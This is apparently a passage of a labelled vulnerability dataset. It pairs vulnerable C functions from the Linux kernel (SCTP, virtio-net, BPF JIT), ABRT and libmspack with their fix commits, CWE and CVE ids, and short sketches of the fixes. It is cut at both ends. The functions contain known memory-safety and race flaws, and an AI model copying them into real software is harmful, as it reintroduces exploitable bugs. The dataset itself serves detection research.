INIT_LIST_HEAD(&sctp_address_families);
sctp_v4_pf_init();
sctp_v6_pf_init();
status = sctp_v4_protosw_init();
if (status)
goto err_protosw_init;
status = sctp_v6_protosw_init();
if (status)
goto err_v6_protosw_init;
status = register_pernet_subsys(&sctp_net_ops);
if (status)
goto err_register_pernet_subsys;
status = sctp_v4_add_protocol();
if (status)
goto err_add_protocol;
/* Register SCTP with inet6 layer. */
status = sctp_v6_add_protocol();
if (status)
goto err_v6_add_protocol;
out:
return status;
err_v6_add_protocol:
sctp_v4_del_protocol();
err_add_protocol:
unregister_pernet_subsys(&sctp_net_ops);
err_register_pernet_subsys:
sctp_v6_protosw_exit();
err_v6_protosw_init:
sctp_v4_protosw_exit();
err_protosw_init:
sctp_v4_pf_exit();
sctp_v6_pf_exit();
sctp_sysctl_unregister();
free_pages((unsigned long)sctp_port_hashtable,
get_order(sctp_port_hashsize *
sizeof(struct sctp_bind_hashbucket)));
err_bhash_alloc:
kfree(sctp_ep_hashtable);
err_ehash_alloc:
free_pages((unsigned long)sctp_assoc_hashtable,
get_order(sctp_assoc_hashsize *
sizeof(struct sctp_hashbucket)));
err_ahash_alloc:
percpu_counter_destroy(&sctp_sockets_allocated);
err_percpu_counter_init:
kmem_cache_destroy(sctp_chunk_cachep);
err_chunk_cachep:
kmem_cache_destroy(sctp_bucket_cachep);
goto out;
}
| 167,189,804,297,399,060,000,000,000,000,000,000,000 | protocol.c | 19,924,814,074,907,472,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-5283 | The sctp_init function in net/sctp/protocol.c in the Linux kernel before 4.2.3 has an incorrect sequence of protocol-initialization steps, which allows local users to cause a denial of service (panic or memory corruption) by creating SCTP sockets before all of the steps have finished. | https://nvd.nist.gov/vuln/detail/CVE-2015-5283 |
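The ordering fix argued for in the commit message can be sketched against the calls visible in sctp_init() above. The split pernet_operations names (sctp_defaults_ops, sctp_ctrlsock_ops) are assumptions about the shape of the patch; everything else is taken from the function:

/* Register per-netns defaults before the protosw entries make SCTP
 * visible to socket(2); keep the control-socket setup (which needs the
 * protocol registered) for last. */
status = register_pernet_subsys(&sctp_defaults_ops);
if (status)
        goto err_register_defaults;

status = sctp_v4_protosw_init();        /* protocol becomes visible here */
if (status)
        goto err_protosw_init;
status = sctp_v6_protosw_init();
if (status)
        goto err_v6_protosw_init;

status = register_pernet_subsys(&sctp_ctrlsock_ops);
if (status)
        goto err_register_ctrlsock;

This way a socket created in the race window still finds net->sctp.local_addr_list and friends initialized, and control-socket errors are still reported synchronously rather than from a workqueue.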
1,466 | abrt | 50ee8130fb4cd4ef1af7682a2c85dd99cb99424e | https://github.com/abrt/abrt | https://github.com/abrt/abrt/commit/50ee8130fb4cd4ef1af7682a2c85dd99cb99424e | a-a-i-d-to-abrt-cache: make own random temporary directory
The set-user-ID wrapper must use its own new temporary directory in order to
avoid security issues with unpacking specially crafted debuginfo
packages that might be used to create files or symlinks anywhere on the
file system as the abrt user.
Without the forking code, the temporary directory would remain on the
filesystem in the case where all debuginfo data are already available.
This is caused by the fact that the underlying libreport functionality
accepts path to a desired temporary directory and creates it only if
necessary. Otherwise, the directory is not touched at all.
This commit addresses CVE-2015-5273
Signed-off-by: Jakub Filak <jfilak@redhat.com> | 1 | int main(int argc, char **argv)
{
/* I18n */
setlocale(LC_ALL, "");
#if ENABLE_NLS
bindtextdomain(PACKAGE, LOCALEDIR);
textdomain(PACKAGE);
#endif
abrt_init(argv);
/* Can't keep these strings/structs static: _() doesn't support that */
const char *program_usage_string = _(
"& [-y] [-i BUILD_IDS_FILE|-i -] [-e PATH[:PATH]...]\n"
"\t[-r REPO]\n"
"\n"
"Installs debuginfo packages for all build-ids listed in BUILD_IDS_FILE to\n"
"ABRT system cache."
);
enum {
OPT_v = 1 << 0,
OPT_y = 1 << 1,
OPT_i = 1 << 2,
OPT_e = 1 << 3,
OPT_r = 1 << 4,
OPT_s = 1 << 5,
};
const char *build_ids = "build_ids";
const char *exact = NULL;
const char *repo = NULL;
const char *size_mb = NULL;
struct options program_options[] = {
OPT__VERBOSE(&g_verbose),
OPT_BOOL ('y', "yes", NULL, _("Noninteractive, assume 'Yes' to all questions")),
OPT_STRING('i', "ids", &build_ids, "BUILD_IDS_FILE", _("- means STDIN, default: build_ids")),
OPT_STRING('e', "exact", &exact, "EXACT", _("Download only specified files")),
OPT_STRING('r', "repo", &repo, "REPO", _("Pattern to use when searching for repos, default: *debug*")),
OPT_STRING('s', "size_mb", &size_mb, "SIZE_MB", _("Ignored option")),
OPT_END()
};
const unsigned opts = parse_opts(argc, argv, program_options, program_usage_string);
const gid_t egid = getegid();
const gid_t rgid = getgid();
const uid_t euid = geteuid();
const gid_t ruid = getuid();
/* We need to open the build ids file under the caller's UID/GID to avoid
* information disclosures when reading files with changed UID.
* Unfortunately, we cannot replace STDIN with the new fd because ABRT uses
* STDIN to communicate with the caller. So, the following code opens a
* dummy file descriptor to the build ids file and passes the new fd's proc
* path to the wrapped program in the ids argument.
* The new fd remains opened, the OS will close it for us. */
char *build_ids_self_fd = NULL;
if (strcmp("-", build_ids) != 0)
{
if (setregid(egid, rgid) < 0)
perror_msg_and_die("setregid(egid, rgid)");
if (setreuid(euid, ruid) < 0)
perror_msg_and_die("setreuid(euid, ruid)");
const int build_ids_fd = open(build_ids, O_RDONLY);
if (setregid(rgid, egid) < 0)
perror_msg_and_die("setregid(rgid, egid)");
if (setreuid(ruid, euid) < 0 )
perror_msg_and_die("setreuid(ruid, euid)");
if (build_ids_fd < 0)
perror_msg_and_die("Failed to open file '%s'", build_ids);
/* We are not going to free this memory. There is no place to do so. */
build_ids_self_fd = xasprintf("/proc/self/fd/%d", build_ids_fd);
}
/* name, -v, --ids, -, -y, -e, EXACT, -r, REPO, --, NULL */
const char *args[11];
{
const char *verbs[] = { "", "-v", "-vv", "-vvv" };
unsigned i = 0;
args[i++] = EXECUTABLE;
args[i++] = "--ids";
args[i++] = (build_ids_self_fd != NULL) ? build_ids_self_fd : "-";
if (g_verbose > 0)
args[i++] = verbs[g_verbose <= 3 ? g_verbose : 3];
if ((opts & OPT_y))
args[i++] = "-y";
if ((opts & OPT_e))
{
args[i++] = "--exact";
args[i++] = exact;
}
if ((opts & OPT_r))
{
args[i++] = "--repo";
args[i++] = repo;
}
args[i++] = "--";
args[i] = NULL;
}
/* Switch real user/group to effective ones.
* Otherwise yum library gets confused - gets EPERM (why??).
*/
/* do setregid only if we have to, to not upset selinux needlessly */
if (egid != rgid)
IGNORE_RESULT(setregid(egid, egid));
if (euid != ruid)
{
IGNORE_RESULT(setreuid(euid, euid));
/* We are suid'ed! */
/* Prevent malicious user from messing up with suid'ed process: */
#if 1
static const char *whitelist[] = {
"REPORT_CLIENT_SLAVE", // Check if the app is being run as a slave
"LANG",
};
const size_t wlsize = sizeof(whitelist)/sizeof(char*);
char *setlist[sizeof(whitelist)/sizeof(char*)] = { 0 };
char *p = NULL;
for (size_t i = 0; i < wlsize; i++)
if ((p = getenv(whitelist[i])) != NULL)
setlist[i] = xstrdup(p);
clearenv();
for (size_t i = 0; i < wlsize; i++)
if (setlist[i] != NULL)
{
xsetenv(whitelist[i], setlist[i]);
free(setlist[i]);
}
#else
/* Clear dangerous stuff from env */
static const char forbid[] =
"LD_LIBRARY_PATH" "\0"
"LD_PRELOAD" "\0"
"LD_TRACE_LOADED_OBJECTS" "\0"
"LD_BIND_NOW" "\0"
"LD_AOUT_LIBRARY_PATH" "\0"
"LD_AOUT_PRELOAD" "\0"
"LD_NOWARN" "\0"
"LD_KEEPDIR" "\0"
;
const char *p = forbid;
do {
unsetenv(p);
p += strlen(p) + 1;
} while (*p);
#endif
/* Set safe PATH */
char path_env[] = "PATH=/usr/sbin:/sbin:/usr/bin:/bin:"BIN_DIR":"SBIN_DIR;
if (euid != 0)
strcpy(path_env, "PATH=/usr/bin:/bin:"BIN_DIR);
putenv(path_env);
/* Use safe umask */
umask(0022);
}
execvp(EXECUTABLE, (char **)args);
error_msg_and_die("Can't execute %s", EXECUTABLE);
}
| 92,934,402,516,180,260,000,000,000,000,000,000,000 | None | null | [
"CWE-59"
] | CVE-2015-5273 | The abrt-action-install-debuginfo-to-abrt-cache help program in Automatic Bug Reporting Tool (ABRT) before 2.7.1 allows local users to write to arbitrary files via a symlink attack on unpacked.cpio in a pre-created directory with a predictable name in /var/tmp. | https://nvd.nist.gov/vuln/detail/CVE-2015-5273 |
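The "own random temporary directory" the commit message requires maps onto POSIX mkdtemp(); a minimal sketch with an illustrative path prefix — not the actual wrapper code:

#define _DEFAULT_SOURCE         /* for mkdtemp() on glibc */
#include <stdio.h>
#include <stdlib.h>

static char *make_private_tmpdir(void)
{
    /* mkdtemp() replaces XXXXXX with a random suffix and creates the
     * directory mode 0700, so no other local user can have pre-created
     * it or planted a symlink at its name. */
    static char tmpl[] = "/tmp/abrt-cache-XXXXXX";
    char *dir = mkdtemp(tmpl);
    if (dir == NULL) {
        perror("mkdtemp");
        exit(EXIT_FAILURE);
    }
    return dir;
}

Unpacking crafted debuginfo cpio archives inside such a directory removes the predictable /var/tmp name the CVE description points at.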
1,467 | linux | 48900cb6af4282fa0fb6ff4d72a81aa3dadb5c39 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/48900cb6af4282fa0fb6ff4d72a81aa3dadb5c39 | virtio-net: drop NETIF_F_FRAGLIST
virtio declares support for NETIF_F_FRAGLIST, but assumes
that there are at most MAX_SKB_FRAGS + 2 fragments, which isn't
always true with a fraglist.
A longer fraglist in the skb will make the call to skb_to_sgvec overflow
the sg array, leading to memory corruption.
Drop NETIF_F_FRAGLIST so we only get what we can handle.
Cc: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
Acked-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int virtnet_probe(struct virtio_device *vdev)
{
int i, err;
struct net_device *dev;
struct virtnet_info *vi;
u16 max_queue_pairs;
if (!vdev->config->get) {
dev_err(&vdev->dev, "%s failure: config access disabled\n",
__func__);
return -EINVAL;
}
if (!virtnet_validate_features(vdev))
return -EINVAL;
/* Find if host supports multiqueue virtio_net device */
err = virtio_cread_feature(vdev, VIRTIO_NET_F_MQ,
struct virtio_net_config,
max_virtqueue_pairs, &max_queue_pairs);
/* We need at least 2 queues */
if (err || max_queue_pairs < VIRTIO_NET_CTRL_MQ_VQ_PAIRS_MIN ||
max_queue_pairs > VIRTIO_NET_CTRL_MQ_VQ_PAIRS_MAX ||
!virtio_has_feature(vdev, VIRTIO_NET_F_CTRL_VQ))
max_queue_pairs = 1;
/* Allocate ourselves a network device with room for our info */
dev = alloc_etherdev_mq(sizeof(struct virtnet_info), max_queue_pairs);
if (!dev)
return -ENOMEM;
/* Set up network device as normal. */
dev->priv_flags |= IFF_UNICAST_FLT | IFF_LIVE_ADDR_CHANGE;
dev->netdev_ops = &virtnet_netdev;
dev->features = NETIF_F_HIGHDMA;
dev->ethtool_ops = &virtnet_ethtool_ops;
SET_NETDEV_DEV(dev, &vdev->dev);
/* Do we support "hardware" checksums? */
if (virtio_has_feature(vdev, VIRTIO_NET_F_CSUM)) {
/* This opens up the world of extra features. */
dev->hw_features |= NETIF_F_HW_CSUM|NETIF_F_SG|NETIF_F_FRAGLIST;
if (csum)
dev->features |= NETIF_F_HW_CSUM|NETIF_F_SG|NETIF_F_FRAGLIST;
if (virtio_has_feature(vdev, VIRTIO_NET_F_GSO)) {
dev->hw_features |= NETIF_F_TSO | NETIF_F_UFO
| NETIF_F_TSO_ECN | NETIF_F_TSO6;
}
/* Individual feature bits: what can host handle? */
if (virtio_has_feature(vdev, VIRTIO_NET_F_HOST_TSO4))
dev->hw_features |= NETIF_F_TSO;
if (virtio_has_feature(vdev, VIRTIO_NET_F_HOST_TSO6))
dev->hw_features |= NETIF_F_TSO6;
if (virtio_has_feature(vdev, VIRTIO_NET_F_HOST_ECN))
dev->hw_features |= NETIF_F_TSO_ECN;
if (virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UFO))
dev->hw_features |= NETIF_F_UFO;
dev->features |= NETIF_F_GSO_ROBUST;
if (gso)
dev->features |= dev->hw_features & (NETIF_F_ALL_TSO|NETIF_F_UFO);
/* (!csum && gso) case will be fixed by register_netdev() */
}
if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_CSUM))
dev->features |= NETIF_F_RXCSUM;
dev->vlan_features = dev->features;
/* Configuration may specify what MAC to use. Otherwise random. */
if (virtio_has_feature(vdev, VIRTIO_NET_F_MAC))
virtio_cread_bytes(vdev,
offsetof(struct virtio_net_config, mac),
dev->dev_addr, dev->addr_len);
else
eth_hw_addr_random(dev);
/* Set up our device-specific information */
vi = netdev_priv(dev);
vi->dev = dev;
vi->vdev = vdev;
vdev->priv = vi;
vi->stats = alloc_percpu(struct virtnet_stats);
err = -ENOMEM;
if (vi->stats == NULL)
goto free;
for_each_possible_cpu(i) {
struct virtnet_stats *virtnet_stats;
virtnet_stats = per_cpu_ptr(vi->stats, i);
u64_stats_init(&virtnet_stats->tx_syncp);
u64_stats_init(&virtnet_stats->rx_syncp);
}
INIT_WORK(&vi->config_work, virtnet_config_changed_work);
/* If we can receive ANY GSO packets, we must allocate large ones. */
if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_TSO4) ||
virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_TSO6) ||
virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_ECN) ||
virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UFO))
vi->big_packets = true;
if (virtio_has_feature(vdev, VIRTIO_NET_F_MRG_RXBUF))
vi->mergeable_rx_bufs = true;
if (virtio_has_feature(vdev, VIRTIO_NET_F_MRG_RXBUF) ||
virtio_has_feature(vdev, VIRTIO_F_VERSION_1))
vi->hdr_len = sizeof(struct virtio_net_hdr_mrg_rxbuf);
else
vi->hdr_len = sizeof(struct virtio_net_hdr);
if (virtio_has_feature(vdev, VIRTIO_F_ANY_LAYOUT) ||
virtio_has_feature(vdev, VIRTIO_F_VERSION_1))
vi->any_header_sg = true;
if (virtio_has_feature(vdev, VIRTIO_NET_F_CTRL_VQ))
vi->has_cvq = true;
if (vi->any_header_sg)
dev->needed_headroom = vi->hdr_len;
/* Use single tx/rx queue pair as default */
vi->curr_queue_pairs = 1;
vi->max_queue_pairs = max_queue_pairs;
/* Allocate/initialize the rx/tx queues, and invoke find_vqs */
err = init_vqs(vi);
if (err)
goto free_stats;
#ifdef CONFIG_SYSFS
if (vi->mergeable_rx_bufs)
dev->sysfs_rx_queue_group = &virtio_net_mrg_rx_group;
#endif
netif_set_real_num_tx_queues(dev, vi->curr_queue_pairs);
netif_set_real_num_rx_queues(dev, vi->curr_queue_pairs);
err = register_netdev(dev);
if (err) {
pr_debug("virtio_net: registering device failed\n");
goto free_vqs;
}
virtio_device_ready(vdev);
/* Last of all, set up some receive buffers. */
for (i = 0; i < vi->curr_queue_pairs; i++) {
try_fill_recv(vi, &vi->rq[i], GFP_KERNEL);
/* If we didn't even get one input buffer, we're useless. */
if (vi->rq[i].vq->num_free ==
virtqueue_get_vring_size(vi->rq[i].vq)) {
free_unused_bufs(vi);
err = -ENOMEM;
goto free_recv_bufs;
}
}
vi->nb.notifier_call = &virtnet_cpu_callback;
err = register_hotcpu_notifier(&vi->nb);
if (err) {
pr_debug("virtio_net: registering cpu notifier failed\n");
goto free_recv_bufs;
}
/* Assume link up if device can't report link status,
otherwise get link status from config. */
if (virtio_has_feature(vi->vdev, VIRTIO_NET_F_STATUS)) {
netif_carrier_off(dev);
schedule_work(&vi->config_work);
} else {
vi->status = VIRTIO_NET_S_LINK_UP;
netif_carrier_on(dev);
}
pr_debug("virtnet: registered device %s with %d RX and TX vq's\n",
dev->name, max_queue_pairs);
return 0;
free_recv_bufs:
vi->vdev->config->reset(vdev);
free_receive_bufs(vi);
unregister_netdev(dev);
free_vqs:
cancel_delayed_work_sync(&vi->refill);
free_receive_page_frags(vi);
virtnet_del_vqs(vi);
free_stats:
free_percpu(vi->stats);
free:
free_netdev(dev);
return err;
}
| 286,743,572,691,752,180,000,000,000,000,000,000,000 | virtio_net.c | 226,259,448,298,505,000,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-5156 | The virtnet_probe function in drivers/net/virtio_net.c in the Linux kernel before 4.2 attempts to support a FRAGLIST feature without proper memory allocation, which allows guest OS users to cause a denial of service (buffer overflow and memory corruption) via a crafted sequence of fragmented packets. | https://nvd.nist.gov/vuln/detail/CVE-2015-5156 |
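The fix described above is a one-flag change to the feature setup in virtnet_probe(); a sketch of the two affected assignments, everything else unchanged:

/* Stop advertising NETIF_F_FRAGLIST so the stack never hands the driver
 * a fraglist skb whose fragment count can exceed the MAX_SKB_FRAGS + 2
 * scatter-gather entries the driver sizes for. */
dev->hw_features |= NETIF_F_HW_CSUM | NETIF_F_SG;
if (csum)
        dev->features |= NETIF_F_HW_CSUM | NETIF_F_SG;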
1,468 | linux | 3f7352bf21f8fd7ba3e2fcef9488756f188e12be | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/3f7352bf21f8fd7ba3e2fcef9488756f188e12be | x86: bpf_jit: fix compilation of large bpf programs
x86 has variable-length encoding. The x86 JIT compiler tries
to pick the shortest encoding for a given bpf instruction.
While doing so, the jump targets change, so the JIT makes
multiple passes over the program. A typical program needs 3 passes.
Some very short programs converge in 2 passes. Large programs
may need 4 or 5. But specially crafted bpf programs may hit the
pass limit, and if the program converges only on the last iteration,
the JIT compiler produces an image full of 'int 3' insns.
Fix this corner case by doing a final iteration over the bpf program.
Fixes: 0a14842f5a3c ("net: filter: Just In Time compiler for x86-64")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Alexei Starovoitov <ast@plumgrid.com>
Tested-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | void bpf_int_jit_compile(struct bpf_prog *prog)
{
struct bpf_binary_header *header = NULL;
int proglen, oldproglen = 0;
struct jit_context ctx = {};
u8 *image = NULL;
int *addrs;
int pass;
int i;
if (!bpf_jit_enable)
return;
if (!prog || !prog->len)
return;
addrs = kmalloc(prog->len * sizeof(*addrs), GFP_KERNEL);
if (!addrs)
return;
/* Before first pass, make a rough estimation of addrs[]
* each bpf instruction is translated to less than 64 bytes
*/
for (proglen = 0, i = 0; i < prog->len; i++) {
proglen += 64;
addrs[i] = proglen;
}
ctx.cleanup_addr = proglen;
for (pass = 0; pass < 10; pass++) {
proglen = do_jit(prog, addrs, image, oldproglen, &ctx);
if (proglen <= 0) {
image = NULL;
if (header)
bpf_jit_binary_free(header);
goto out;
}
if (image) {
if (proglen != oldproglen) {
pr_err("bpf_jit: proglen=%d != oldproglen=%d\n",
proglen, oldproglen);
goto out;
}
break;
}
if (proglen == oldproglen) {
header = bpf_jit_binary_alloc(proglen, &image,
1, jit_fill_hole);
if (!header)
goto out;
}
oldproglen = proglen;
}
if (bpf_jit_enable > 1)
bpf_jit_dump(prog->len, proglen, 0, image);
if (image) {
bpf_flush_icache(header, image + proglen);
set_memory_ro((unsigned long)header, header->pages);
prog->bpf_func = (void *)image;
prog->jited = true;
}
out:
kfree(addrs);
}
| 286,732,731,074,854,750,000,000,000,000,000,000,000 | bpf_jit_comp.c | 247,386,070,920,950,060,000,000,000,000,000,000,000 | [
"CWE-17"
] | CVE-2015-4700 | The bpf_int_jit_compile function in arch/x86/net/bpf_jit_comp.c in the Linux kernel before 4.0.6 allows local users to cause a denial of service (system crash) by creating a packet filter and then loading crafted BPF instructions that trigger late convergence by the JIT compiler. | https://nvd.nist.gov/vuln/detail/CVE-2015-4700 |
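The "final iteration" fix amounts to changing the pass loop header in the function above; the exact upstream condition may differ, but the intent is that once the image is allocated, at least one more do_jit() pass must run to write the converged encodings into it:

/* '|| image' guarantees an extra pass after bpf_jit_binary_alloc(), so
 * the image is filled with real instructions rather than the int3 fill
 * left by jit_fill_hole(). */
for (pass = 0; pass < 10 || image; pass++) {
        proglen = do_jit(prog, addrs, image, oldproglen, &ctx);
        /* loop body exactly as in the function above: error out on
         * proglen <= 0, verify stability and break once image != NULL,
         * allocate the image when proglen == oldproglen */
        oldproglen = proglen;
}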
1,469 | libmspack | 18b6a2cc0b87536015bedd4f7763e6b02d5aa4f3 | https://github.com/kyz/libmspack | https://github.com/kyz/libmspack/commit/18b6a2cc0b87536015bedd4f7763e6b02d5aa4f3 | Prevent a 1-byte underread of the input buffer if an odd-sized data block comes just before an uncompressed block header | 1 | int lzxd_decompress(struct lzxd_stream *lzx, off_t out_bytes) {
/* bitstream and huffman reading variables */
register unsigned int bit_buffer;
register int bits_left, i=0;
unsigned char *i_ptr, *i_end;
register unsigned short sym;
int match_length, length_footer, extra, verbatim_bits, bytes_todo;
int this_run, main_element, aligned_bits, j;
unsigned char *window, *runsrc, *rundest, buf[12];
unsigned int frame_size=0, end_frame, match_offset, window_posn;
unsigned int R0, R1, R2;
/* easy answers */
if (!lzx || (out_bytes < 0)) return MSPACK_ERR_ARGS;
if (lzx->error) return lzx->error;
/* flush out any stored-up bytes before we begin */
i = lzx->o_end - lzx->o_ptr;
if ((off_t) i > out_bytes) i = (int) out_bytes;
if (i) {
if (lzx->sys->write(lzx->output, lzx->o_ptr, i) != i) {
return lzx->error = MSPACK_ERR_WRITE;
}
lzx->o_ptr += i;
lzx->offset += i;
out_bytes -= i;
}
if (out_bytes == 0) return MSPACK_ERR_OK;
/* restore local state */
RESTORE_BITS;
window = lzx->window;
window_posn = lzx->window_posn;
R0 = lzx->R0;
R1 = lzx->R1;
R2 = lzx->R2;
end_frame = (unsigned int)((lzx->offset + out_bytes) / LZX_FRAME_SIZE) + 1;
while (lzx->frame < end_frame) {
/* have we reached the reset interval? (if there is one?) */
if (lzx->reset_interval && ((lzx->frame % lzx->reset_interval) == 0)) {
if (lzx->block_remaining) {
D(("%d bytes remaining at reset interval", lzx->block_remaining))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* re-read the intel header and reset the huffman lengths */
lzxd_reset_state(lzx);
R0 = lzx->R0;
R1 = lzx->R1;
R2 = lzx->R2;
}
/* LZX DELTA format has chunk_size, not present in LZX format */
if (lzx->is_delta) {
ENSURE_BITS(16);
REMOVE_BITS(16);
}
/* read header if necessary */
if (!lzx->header_read) {
/* read 1 bit. if bit=0, intel filesize = 0.
* if bit=1, read intel filesize (32 bits) */
j = 0; READ_BITS(i, 1); if (i) { READ_BITS(i, 16); READ_BITS(j, 16); }
lzx->intel_filesize = (i << 16) | j;
lzx->header_read = 1;
}
/* calculate size of frame: all frames are 32k except the final frame
* which is 32kb or less. this can only be calculated when lzx->length
* has been filled in. */
frame_size = LZX_FRAME_SIZE;
if (lzx->length && (lzx->length - lzx->offset) < (off_t)frame_size) {
frame_size = lzx->length - lzx->offset;
}
/* decode until one more frame is available */
bytes_todo = lzx->frame_posn + frame_size - window_posn;
while (bytes_todo > 0) {
/* initialise new block, if one is needed */
if (lzx->block_remaining == 0) {
/* realign if previous block was an odd-sized UNCOMPRESSED block */
if ((lzx->block_type == LZX_BLOCKTYPE_UNCOMPRESSED) &&
(lzx->block_length & 1))
{
READ_IF_NEEDED;
i_ptr++;
}
/* read block type (3 bits) and block length (24 bits) */
READ_BITS(lzx->block_type, 3);
READ_BITS(i, 16); READ_BITS(j, 8);
lzx->block_remaining = lzx->block_length = (i << 8) | j;
/*D(("new block t%d len %u", lzx->block_type, lzx->block_length))*/
/* read individual block headers */
switch (lzx->block_type) {
case LZX_BLOCKTYPE_ALIGNED:
/* read lengths of and build aligned huffman decoding tree */
for (i = 0; i < 8; i++) { READ_BITS(j, 3); lzx->ALIGNED_len[i] = j; }
BUILD_TABLE(ALIGNED);
/* no break -- rest of aligned header is same as verbatim */
case LZX_BLOCKTYPE_VERBATIM:
/* read lengths of and build main huffman decoding tree */
READ_LENGTHS(MAINTREE, 0, 256);
READ_LENGTHS(MAINTREE, 256, LZX_NUM_CHARS + lzx->num_offsets);
BUILD_TABLE(MAINTREE);
/* if the literal 0xE8 is anywhere in the block... */
if (lzx->MAINTREE_len[0xE8] != 0) lzx->intel_started = 1;
/* read lengths of and build lengths huffman decoding tree */
READ_LENGTHS(LENGTH, 0, LZX_NUM_SECONDARY_LENGTHS);
BUILD_TABLE_MAYBE_EMPTY(LENGTH);
break;
case LZX_BLOCKTYPE_UNCOMPRESSED:
/* because we can't assume otherwise */
lzx->intel_started = 1;
/* read 1-16 (not 0-15) bits to align to bytes */
ENSURE_BITS(16);
if (bits_left > 16) i_ptr -= 2;
bits_left = 0; bit_buffer = 0;
/* read 12 bytes of stored R0 / R1 / R2 values */
for (rundest = &buf[0], i = 0; i < 12; i++) {
READ_IF_NEEDED;
*rundest++ = *i_ptr++;
}
R0 = buf[0] | (buf[1] << 8) | (buf[2] << 16) | (buf[3] << 24);
R1 = buf[4] | (buf[5] << 8) | (buf[6] << 16) | (buf[7] << 24);
R2 = buf[8] | (buf[9] << 8) | (buf[10] << 16) | (buf[11] << 24);
break;
default:
D(("bad block type"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
}
/* decode more of the block:
* run = min(what's available, what's needed) */
this_run = lzx->block_remaining;
if (this_run > bytes_todo) this_run = bytes_todo;
/* assume we decode exactly this_run bytes, for now */
bytes_todo -= this_run;
lzx->block_remaining -= this_run;
/* decode at least this_run bytes */
switch (lzx->block_type) {
case LZX_BLOCKTYPE_VERBATIM:
while (this_run > 0) {
READ_HUFFSYM(MAINTREE, main_element);
if (main_element < LZX_NUM_CHARS) {
/* literal: 0 to LZX_NUM_CHARS-1 */
window[window_posn++] = main_element;
this_run--;
}
else {
/* match: LZX_NUM_CHARS + ((slot<<3) | length_header (3 bits)) */
main_element -= LZX_NUM_CHARS;
/* get match length */
match_length = main_element & LZX_NUM_PRIMARY_LENGTHS;
if (match_length == LZX_NUM_PRIMARY_LENGTHS) {
if (lzx->LENGTH_empty) {
D(("LENGTH symbol needed but tree is empty"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
READ_HUFFSYM(LENGTH, length_footer);
match_length += length_footer;
}
match_length += LZX_MIN_MATCH;
/* get match offset */
switch ((match_offset = (main_element >> 3))) {
case 0: match_offset = R0; break;
case 1: match_offset = R1; R1=R0; R0 = match_offset; break;
case 2: match_offset = R2; R2=R0; R0 = match_offset; break;
case 3: match_offset = 1; R2=R1; R1=R0; R0 = match_offset; break;
default:
extra = (match_offset >= 36) ? 17 : extra_bits[match_offset];
READ_BITS(verbatim_bits, extra);
match_offset = position_base[match_offset] - 2 + verbatim_bits;
R2 = R1; R1 = R0; R0 = match_offset;
}
/* LZX DELTA uses max match length to signal even longer match */
if (match_length == LZX_MAX_MATCH && lzx->is_delta) {
int extra_len = 0;
ENSURE_BITS(3); /* 4 entry huffman tree */
if (PEEK_BITS(1) == 0) {
REMOVE_BITS(1); /* '0' -> 8 extra length bits */
READ_BITS(extra_len, 8);
}
else if (PEEK_BITS(2) == 2) {
REMOVE_BITS(2); /* '10' -> 10 extra length bits + 0x100 */
READ_BITS(extra_len, 10);
extra_len += 0x100;
}
else if (PEEK_BITS(3) == 6) {
REMOVE_BITS(3); /* '110' -> 12 extra length bits + 0x500 */
READ_BITS(extra_len, 12);
extra_len += 0x500;
}
else {
REMOVE_BITS(3); /* '111' -> 15 extra length bits */
READ_BITS(extra_len, 15);
}
match_length += extra_len;
}
if ((window_posn + match_length) > lzx->window_size) {
D(("match ran over window wrap"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* copy match */
rundest = &window[window_posn];
i = match_length;
/* does match offset wrap the window? */
if (match_offset > window_posn) {
if (match_offset > lzx->offset &&
(match_offset - window_posn) > lzx->ref_data_size)
{
D(("match offset beyond LZX stream"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* j = length from match offset to end of window */
j = match_offset - window_posn;
if (j > (int) lzx->window_size) {
D(("match offset beyond window boundaries"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
runsrc = &window[lzx->window_size - j];
if (j < i) {
/* if match goes over the window edge, do two copy runs */
i -= j; while (j-- > 0) *rundest++ = *runsrc++;
runsrc = window;
}
while (i-- > 0) *rundest++ = *runsrc++;
}
else {
runsrc = rundest - match_offset;
while (i-- > 0) *rundest++ = *runsrc++;
}
this_run -= match_length;
window_posn += match_length;
}
} /* while (this_run > 0) */
break;
case LZX_BLOCKTYPE_ALIGNED:
while (this_run > 0) {
READ_HUFFSYM(MAINTREE, main_element);
if (main_element < LZX_NUM_CHARS) {
/* literal: 0 to LZX_NUM_CHARS-1 */
window[window_posn++] = main_element;
this_run--;
}
else {
/* match: LZX_NUM_CHARS + ((slot<<3) | length_header (3 bits)) */
main_element -= LZX_NUM_CHARS;
/* get match length */
match_length = main_element & LZX_NUM_PRIMARY_LENGTHS;
if (match_length == LZX_NUM_PRIMARY_LENGTHS) {
if (lzx->LENGTH_empty) {
D(("LENGTH symbol needed but tree is empty"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
READ_HUFFSYM(LENGTH, length_footer);
match_length += length_footer;
}
match_length += LZX_MIN_MATCH;
/* get match offset */
switch ((match_offset = (main_element >> 3))) {
case 0: match_offset = R0; break;
case 1: match_offset = R1; R1 = R0; R0 = match_offset; break;
case 2: match_offset = R2; R2 = R0; R0 = match_offset; break;
default:
extra = (match_offset >= 36) ? 17 : extra_bits[match_offset];
match_offset = position_base[match_offset] - 2;
if (extra > 3) {
/* verbatim and aligned bits */
extra -= 3;
READ_BITS(verbatim_bits, extra);
match_offset += (verbatim_bits << 3);
READ_HUFFSYM(ALIGNED, aligned_bits);
